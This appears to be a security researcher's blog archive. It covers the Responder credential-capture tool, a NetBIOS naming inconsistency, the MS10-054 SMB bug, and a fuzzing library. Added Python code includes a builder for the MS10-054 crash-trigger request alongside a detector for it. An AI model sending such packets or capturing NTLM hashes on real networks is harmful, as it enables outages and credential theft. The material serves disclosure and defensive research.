Wednesday, February 6, 2013

Some fun with Responder 1.8

I've made a short video on Responder 1.8 usage and examples.

This video can be found here: http://www.youtube.com/watch?v=nkpK5lIPHg8

Note that with the latest version, when you open IE you won't get any password prompt for WPAD (unlike in this video): the browser sends its NTLM authentication (the Net-NTLM challenge/response that Responder captures) along transparently.

As always, latest version can be found here: https://github.com/SpiderLabs/Responder/

Cheers

Thursday, January 24, 2013

Owning Windows Networks with Responder 1.7

Full post and download link can be found here :

http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html

Wednesday, October 24, 2012

Introducing Responder 1.0

I recently released an LLMNR/NBT-NS responder with several rogue auth servers.

Full details about this tool and download link can be found here : http://blog.spiderlabs.com/2012/10/introducing-responder-10.html

Wednesday, September 5, 2012

When MSFT does not respect their own protocol.

According to this : http://support.microsoft.com/kb/909264

NetBIOS computer names cannot contain the following characters:
  • backslash (\)
  • slash mark (/)
  • colon (:)
  • asterisk (*)
  • question mark (?)
  • quotation mark (")
  • less than sign (<)
  • greater than sign (>)
  • vertical bar (|)
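As an added example (not part of the original post), here is that KB909264 rule as a check in Python, next to the RFC 1001/1002 "first-level" encoding that NBT-NS actually puts on the wire. The encoding carries the forbidden characters through untouched, so the character rule is a convention enforced (or not) by the tooling, never by the protocol itself. The sample names are constructed and the helper names are mine.

```python
# Added example, not code from the original post: KB909264 character rule vs. the
# NetBIOS wire encoding (RFC 1002 section 4.1, "first-level encoding").

# Characters KB909264 says a NetBIOS computer name cannot contain.
KB909264_FORBIDDEN = set('\\/:*?"<>|')
NETBIOS_NAME_LEN = 15          # the 16th byte of the NetBIOS name is the suffix (service type)


def kb909264_violations(name: str) -> list:
    """Return the forbidden characters present in `name` (empty list = compliant)."""
    return sorted({c for c in name if c in KB909264_FORBIDDEN})


def encode_netbios_name(name: str, suffix: int = 0x20) -> bytes:
    """RFC 1002 first-level encoding: upper-case, pad the name to 15 bytes with spaces,
    append the 1-byte suffix, then split every byte into two nibbles mapped to 'A'..'P'.
    Every byte value encodes, forbidden characters included. Names are truncated to
    15 bytes and must be ASCII (assumption for this example)."""
    raw = name.upper().encode("ascii")[:NETBIOS_NAME_LEN].ljust(NETBIOS_NAME_LEN, b" ")
    raw += bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(ord("A") + (b >> 4))
        out.append(ord("A") + (b & 0x0F))
    return bytes(out)


def decode_netbios_name(encoded: bytes) -> tuple:
    """Inverse of encode_netbios_name(): returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 bytes")
    raw = bytes(((encoded[i] - ord("A")) << 4) | (encoded[i + 1] - ord("A"))
                for i in range(0, 32, 2))
    return raw[:NETBIOS_NAME_LEN].rstrip(b" ").decode("ascii"), raw[NETBIOS_NAME_LEN]


if __name__ == "__main__":
    # constructed sample names: one compliant, two violating the KB909264 rule
    for candidate in ["FILESRV01", "EVIL*HOST", 'SRV"<>|']:
        bad = kb909264_violations(candidate)
        wire = encode_netbios_name(candidate)
        name, suffix = decode_netbios_name(wire)
        print(f"{candidate!r:14} violations={bad!r:22} wire={wire.decode()} "
              f"round-trip={name!r}/{suffix:#04x}")
```

The round trip is the point: a name like `EVIL*HOST` encodes, travels in an NBT-NS name query or registration, and decodes back with the asterisk intact, which is exactly why the in-house tools below have nothing at the protocol layer stopping them from accepting it.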
Let's see how MSFT implemented their own rules in their in-house tools:



Ok great...

What about the rest?


Alright. Let's see:





MSFT Rule #78: Do what I say, not what I do.

*Update:

Net view example:


Thursday, May 10, 2012

Slides for Turning Client Side To Server Side RuxMon 2011 (Melbourne)

Long time no blog.
I gave that talk in March 2011 at Ruxmon.
I thought I should share this, since this blog is kind of a repository of some bugs I've published.

Thanks to the ruxcon & ruxmon crew!

http://www.slideshare.net/fullscreen/lgandx/turning-clientsidetoserversideruxcon2011laurent/1

Wednesday, August 11, 2010

MS SMB Remote Trans2 Zero Size Pool Allocation (MS10-054)

This SMBv1 vulnerability was disclosed to MS in February 2010 and patched this month in the MS10-054 bulletin.

This vulnerability is quite interesting since it is present in every Windows version since Windows 2000, and can be triggered easily through the Trans2 QUERY_FS_INFO subcommand by setting Max Data Count to 0 with at least two different information levels:
- QUERY_FS_INFO, Query FS Attribute Info
- QUERY_FS_INFO, Query FS Volume Info


You can find the full advisory here: http://seclists.org/fulldisclosure/2010/Aug/122
SRD blog entry: http://blogs.technet.com/b/srd/archive/2010/08/10/ms10-054-exploitability-details-for-the-smb-server-update.aspx
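As an added example (not the advisory's code), the following builds an SMBv1 SMB_COM_TRANSACTION2 / TRANS2_QUERY_FS_INFORMATION request so the Max Data Count field can be seen in context, and pairs it with a checker that flags the zero-Max-Data-Count shape at the two information levels named above, the kind of rule an SMB-aware IDS or a pcap triage script would apply. Field layouts follow MS-CIFS; the flag values, TID/UID and the single-NUL Name byte are assumptions of mine, and the function names are mine. Nothing is sent on the network: a request like this against an unpatched host is a crash, not a test.

```python
# Added example, not from the original advisory: build and inspect a Trans2
# QUERY_FS_INFORMATION request offline. Offsets and field order follow MS-CIFS
# 2.2.3.1 (SMB_Header) and 2.2.4.46.1 (SMB_COM_TRANSACTION2 request).
import struct

SMB_COM_TRANSACTION2 = 0x32
TRANS2_QUERY_FS_INFORMATION = 0x0003
SMB_QUERY_FS_VOLUME_INFO = 0x0102       # "Query FS Volume Info"
SMB_QUERY_FS_ATTRIBUTE_INFO = 0x0105    # "Query FS Attribute Info"
SMB_HEADER_LEN = 32


def smb_header(command, tid=0, uid=0, pid=0, mid=0):
    """32-byte SMB_Header, little-endian. Flags/Flags2 values are assumptions
    (case-insensitive + canonical paths; Unicode, NT status, long names)."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, 0x18, 0xC001,
                       0, b"\x00" * 8, 0, tid, pid, uid, mid)


def trans2_query_fs_info(info_level, max_data_count, tid=1, uid=1):
    """SMB_COM_TRANSACTION2 request carrying TRANS2_QUERY_FS_INFORMATION.
    The Trans2 parameter block is the 2-byte InformationLevel; there is no data block."""
    params = struct.pack("<H", info_level)
    words_len = 1 + 28 + 2                 # WordCount byte, 14 words, one Setup word
    name_len = 1                           # Trans2 Name field: single NUL byte (assumption)
    param_off = SMB_HEADER_LEN + words_len + 2 + name_len   # offsets count from the SMB header
    pad1 = (-param_off) % 4                # Pad1 aligns the parameter block to 4 bytes
    param_off += pad1
    data_off = param_off + len(params)
    words = struct.pack("<HHHHBBHIHHHHHBBH",
                        len(params), 0,            # TotalParameterCount, TotalDataCount
                        0, max_data_count,         # MaxParameterCount, MaxDataCount <- the field the advisory is about
                        0, 0,                      # MaxSetupCount, Reserved1
                        0, 0,                      # Flags, Timeout
                        0,                         # Reserved2
                        len(params), param_off,    # ParameterCount, ParameterOffset
                        0, data_off,               # DataCount, DataOffset
                        1, 0,                      # SetupCount, Reserved3
                        TRANS2_QUERY_FS_INFORMATION)   # Setup[0] = subcommand
    body = b"\x00" + b"\x00" * pad1 + params       # Name, Pad1, Trans2_Parameters
    return (smb_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid) + bytes([15])
            + words + struct.pack("<H", len(body)) + body)


def parse_trans2(pkt):
    """Pull subcommand, MaxDataCount and (for QUERY_FS_INFORMATION) the InformationLevel
    out of a raw SMBv1 request. Returns None for anything that is not a Trans2 request."""
    if len(pkt) < SMB_HEADER_LEN + 1 or pkt[:4] != b"\xffSMB" or pkt[4] != SMB_COM_TRANSACTION2:
        return None
    word_count = pkt[SMB_HEADER_LEN]
    words = pkt[SMB_HEADER_LEN + 1:SMB_HEADER_LEN + 1 + 2 * word_count]
    max_data_count = struct.unpack_from("<H", words, 6)[0]
    param_count, param_off = struct.unpack_from("<HH", words, 18)
    setup_count = words[26]
    setup = struct.unpack_from("<%dH" % setup_count, words, 28) if setup_count else ()
    info = {"subcommand": setup[0] if setup else None,
            "max_data_count": max_data_count, "info_level": None}
    if setup and setup[0] == TRANS2_QUERY_FS_INFORMATION and param_count >= 2:
        info["info_level"] = struct.unpack_from("<H", pkt, param_off)[0]
    return info


def looks_like_ms10_054_trigger(pkt):
    """True for a QUERY_FS_INFORMATION request with MaxDataCount == 0 at one of the two
    information levels the advisory names."""
    info = parse_trans2(pkt)
    return bool(info) and info["subcommand"] == TRANS2_QUERY_FS_INFORMATION \
        and info["max_data_count"] == 0 \
        and info["info_level"] in (SMB_QUERY_FS_VOLUME_INFO, SMB_QUERY_FS_ATTRIBUTE_INFO)


if __name__ == "__main__":
    pkt = trans2_query_fs_info(SMB_QUERY_FS_ATTRIBUTE_INFO, max_data_count=0)
    print(pkt.hex())
    print(parse_trans2(pkt), looks_like_ms10_054_trigger(pkt))
```

A legitimate client asks for a sensible Max Data Count (the size of the structure it expects back); a zero there with these information levels has no benign use, which is what makes it a clean signature to carry in a detection rule.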

Wednesday, May 12, 2010

Fuzzing lib released

This is a fuzzing lib I've been working on for a while (it's not a complete one, but still pretty powerful). You can adapt it very easily to your fuzzer by invoking:

import lib
from lib import *

Then you call one specific function, or randfunc().
randfunc() picks one of the lib's functions at random to fuzz with.

Here's a quick example using this lib:

http://pastebin.com/fNFAW3Fh   (this is not an SMB fuzzer, it's simply an example of using this lib)

And yes, you need to include the lib, which is located here:

http://pastebin.com/xgPXpGtw
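As an added example (not the pastebin lib, which is not on this page), here is a small mutation library in the same shape the post describes: one function per test case plus a randfunc() that picks one at random, run against a constructed `u16 length || payload` message with a toy parser that trusts its length prefix. The wire format, the mutators and all helper names are mine.

```python
# Added example, not the author's lib: the "one function per case + randfunc()"
# pattern applied to a constructed length-prefixed message format.
import random
import struct

MAX_U16 = 0xFFFF


def long_string(n=4096):
    """Overlong field: the classic overflow probe."""
    return b"A" * n


def format_string():
    """Format-string probe."""
    return b"%s%x%n" * 8


def boundary_int16():
    """Boundary values for a 16-bit length field."""
    return random.choice([0, 1, 0x7FFF, 0x8000, MAX_U16])


def bit_flip(data, count=4):
    """Flip up to `count` random bits in a copy of `data` (a bit may be flipped twice)."""
    buf = bytearray(data)
    for _ in range(count):
        i = random.randrange(len(buf))
        buf[i] ^= 1 << random.randrange(8)
    return bytes(buf)


STRING_FUNCS = [long_string, format_string]
INT_FUNCS = [boundary_int16]


def randfunc(kind="string"):
    """Pick one mutator of the requested kind at random and return its output."""
    funcs = STRING_FUNCS if kind == "string" else INT_FUNCS
    return random.choice(funcs)()


def fuzz_message(seed, payload=b"hello"):
    """One fuzz case of the constructed `u16 length || payload` format. Seeding makes every
    case reproducible, so a crashing seed can be replayed later."""
    random.seed(seed)
    strategy = random.choice(["length", "payload", "bits"])
    if strategy == "length":                       # lie in the length prefix
        return struct.pack("<H", randfunc("int")) + payload
    if strategy == "payload":                      # honest length, hostile payload
        body = randfunc("string")
        return struct.pack("<H", min(len(body), MAX_U16)) + body
    return bit_flip(struct.pack("<H", len(payload)) + payload)   # dumb bit flips


def parse_message(msg):
    """Toy target: trusts the length prefix, which is the bug the fuzzer should surface."""
    (n,) = struct.unpack_from("<H", msg)
    body = msg[2:2 + n]
    if len(body) != n:
        raise ValueError("truncated: header says %d, got %d bytes" % (n, len(body)))
    return body


def campaign(seeds):
    """Run the target over the fuzz cases; return the seeds that made it raise."""
    crashes = []
    for s in seeds:
        try:
            parse_message(fuzz_message(s))
        except Exception:
            crashes.append(s)
    return crashes


if __name__ == "__main__":
    bad = campaign(range(200))
    print("%d of 200 cases raised; first crashing seeds: %r" % (len(bad), bad[:5]))
```

The split into string and integer mutators is what lets randfunc() stay generic: the fuzzer decides which field it is filling, the lib decides how to abuse it, and the seed is the only thing you need to keep to reproduce a finding.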

Enjoy !